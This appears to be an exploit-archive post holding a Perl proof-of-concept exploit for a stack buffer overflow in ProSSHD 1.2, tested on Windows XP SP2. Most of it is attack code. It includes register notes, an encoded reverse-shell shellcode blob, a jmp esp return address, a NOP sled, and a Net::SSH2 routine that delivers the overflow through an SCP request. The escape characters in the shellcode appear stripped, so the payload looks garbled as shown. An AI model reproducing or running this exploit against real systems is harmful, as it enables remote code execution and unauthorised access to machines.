Home / os / winme

prosshd-overflow.txt

Posted on 03 March 2010

# Exploit Title: ProSSHD buffer overflow
# Date: 2010.02.19
# Author: S2 Crew [Hungary]
# Software Link: http://www.labtam-inc.com/
# Version: 1.2 20090726

# Tested on:  Windows XP SP2
 EN
# CVE: -

# Registers:
# EAX 000003E4
# ECX 0012ED44
# EDX 7C90EB94 ntdll.KiFastSystemCallRet
# EBX 00000674
# ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..."
# EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..."
# ESI 7C81DD9A kernel32.CreatePipe
# EDI 0012F3D8 ASCII "BBBBBBBBBBBBBBBBBBB..."
# EIP 77D5B8D6 USER32.77D5B8D6

#!/usr/bin/perl

use Net::SSH2;

$username = 'test';
$password = 'test';

$host = '172.16.29.133';
$port = 22;

[*] x86/alpha_mixed succeeded with size 692 (iteration=1) reverse_shell_tcp
$shell =
"x89xe5xdaxd7xd9x75xf4x5ex56x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx48x68x4ex69x45x50x47x70" .
"x43x30x51x70x4fx79x4bx55x44x71x4ex32x51x74" .
"x4ex6bx43x62x44x70x4ex6bx46x32x46x6cx4ex6b" .
"x51x42x45x44x4cx4bx50x72x51x38x46x6fx4fx47" .
"x51x5ax51x36x50x31x4bx4fx45x61x4bx70x4ex4c" .
"x47x4cx51x71x43x4cx47x72x46x4cx47x50x4ax61" .
"x48x4fx46x6dx45x51x4fx37x4dx32x4cx30x51x42" .
"x51x47x4ex6bx51x42x44x50x4cx4bx50x42x47x4c" .
"x43x31x48x50x4ex6bx43x70x51x68x4ex65x49x50" .
"x43x44x42x6ax47x71x4ex30x50x50x4cx4bx50x48" .
"x47x68x4ex6bx46x38x51x30x45x51x4bx63x48x63" .
"x47x4cx51x59x4cx4bx50x34x4cx4bx45x51x48x56" .
"x45x61x49x6fx50x31x49x50x4cx6cx49x51x48x4f" .
"x44x4dx45x51x4ax67x47x48x4dx30x50x75x48x74" .
"x43x33x43x4dx4cx38x45x6bx51x6dx46x44x43x45" .
"x4ax42x51x48x4ex6bx46x38x47x54x47x71x4ax73" .
"x42x46x4ex6bx44x4cx42x6bx4cx4bx51x48x47x6c" .
"x46x61x4ex33x4cx4bx43x34x4cx4bx46x61x48x50" .
"x4dx59x43x74x44x64x46x44x51x4bx43x6bx50x61" .
"x43x69x51x4ax46x31x4bx4fx49x70x43x68x43x6f" .
"x50x5ax4cx4bx42x32x48x6bx4bx36x51x4dx50x68" .
"x45x63x45x62x47x70x45x50x42x48x42x57x44x33" .
"x45x62x43x6fx46x34x42x48x50x4cx42x57x51x36" .
"x44x47x49x6fx4ax75x4fx48x4cx50x46x61x47x70" .
"x45x50x45x79x4fx34x46x34x46x30x50x68x45x79" .
"x4bx30x42x4bx47x70x49x6fx4bx65x46x30x42x70" .
"x42x70x42x70x51x50x46x30x51x50x50x50x43x58" .
"x4bx5ax46x6fx49x4fx49x70x4bx4fx4ax75x4dx59" .
"x4bx77x43x58x4cx6cx44x50x47x6dx4bx30x50x68" .
"x44x42x45x50x46x71x51x4cx4fx79x49x76x50x6a" .
"x46x70x50x56x51x47x42x48x4ax39x4fx55x51x64" .
"x45x31x4bx4fx4ax75x50x68x42x43x50x6dx45x34" .
"x45x50x4ex69x4ax43x50x57x50x57x46x37x45x61" .
"x48x76x50x6ax44x52x43x69x42x76x4ax42x4bx4d" .
"x43x56x4ax67x51x54x44x64x47x4cx43x31x45x51" .
"x4ex6dx42x64x45x74x44x50x4ax66x47x70x43x74" .
"x50x54x46x30x43x66x43x66x46x36x47x36x42x76" .
"x50x4ex51x46x43x66x46x33x46x36x50x68x51x69" .
"x4ax6cx45x6fx4bx36x49x6fx4bx65x4bx39x49x70" .
"x50x4ex50x56x47x36x49x6fx46x50x43x58x46x68" .
"x4ex67x45x4dx43x50x4bx4fx49x45x4dx6bx4ax50" .
"x4ex55x49x32x43x66x50x68x49x36x4ax35x4dx6d" .
"x4dx4dx4bx4fx4ax75x45x6cx45x56x51x6cx45x5a" .
"x4bx30x4bx4bx49x70x42x55x43x35x4fx4bx47x37" .
"x46x73x43x42x42x4fx51x7ax43x30x50x53x49x6f" .
"x48x55x47x7ax41x41";

# jmp esp 0x77dc7c7b user32.dll

$fuzz = "x41"x490 . "x7Bx7CxDCx77". "x90"x1000 . $shell;


$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "
Error: Connection Refused!
";
$ssh2->auth_password($username, $password) || die "
Error: Username/Password Denied!
";
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();

 

TOP